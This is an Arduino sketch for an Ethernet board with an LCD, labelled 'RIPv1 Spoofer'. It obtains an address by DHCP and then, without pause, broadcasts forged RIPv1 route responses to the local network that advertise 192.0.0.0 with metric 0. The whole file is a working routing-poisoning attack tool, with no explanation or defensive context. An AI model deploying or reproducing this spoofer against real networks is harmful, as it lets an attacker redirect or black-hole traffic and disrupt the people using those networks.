 
#include <SPI.h>
#include <Ethernet.h>
#include <EthernetUdp.h>
#include <LiquidCrystal.h>

// Enter a MAC address and IP address for your controller below.
// The IP address will be dependent on your local network:
byte mac[] = {  
  0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xEA };
 
EthernetUDP Udp;
unsigned int localPort = 520;
unsigned int remotePort = 520;
byte broadcast[] ={192,168,1,255} ;
const int packetSize = 24;
byte packetBuffer[packetSize];
LiquidCrystal lcd(A0, 2, A4, A2, A3, A1);
 
 void setup()
 {
    lcd.begin(16, 2);
    lcd.print("RIPv1 Spoofer");
    delay(1500);
   Serial.begin(115200);
   lcd.clear();
 lcd.print("Contacting DHCP");
 delay(1000);
 if (Ethernet.begin(mac)== 1)
   {
     lcd.clear(); 
     lcd.print("My IP Address is:");
     lcd.setCursor(0,1);
     lcd.print(Ethernet.localIP())  ;
   } 
   
   else {
     Serial.println("Something went wrong");
     lcd.clear();
     lcd.print("Something went wrong");
   }
   Udp.begin(localPort);
   Serial.print(Ethernet.localIP())  ;
   delay(1000);
   lcd.clear();
   lcd.print("Commencing Spoof");
   lcd.setCursor(0,1);
   lcd.print("N:192.0.0.0 M:0");
 
}

void loop()
{
  Udp.beginPacket(broadcast,remotePort);
  
  memset(packetBuffer, 0, packetSize);
  packetBuffer[0] = 0x2; // Rip command of response
  packetBuffer[1]= 0x1; //RIP v1
  packetBuffer[2] = 0x0;// bytes of padding
  packetBuffer[3]= 0x0;
  packetBuffer[4]= 0x0;
  packetBuffer[5] = 0x02;
  packetBuffer[8]= 0xC0; // first octet of network to spoof C0 = 192
  packetBuffer[23]=0x00; // metric for the route
  Udp.write(packetBuffer,packetSize);
  Udp.endPacket();

  
}
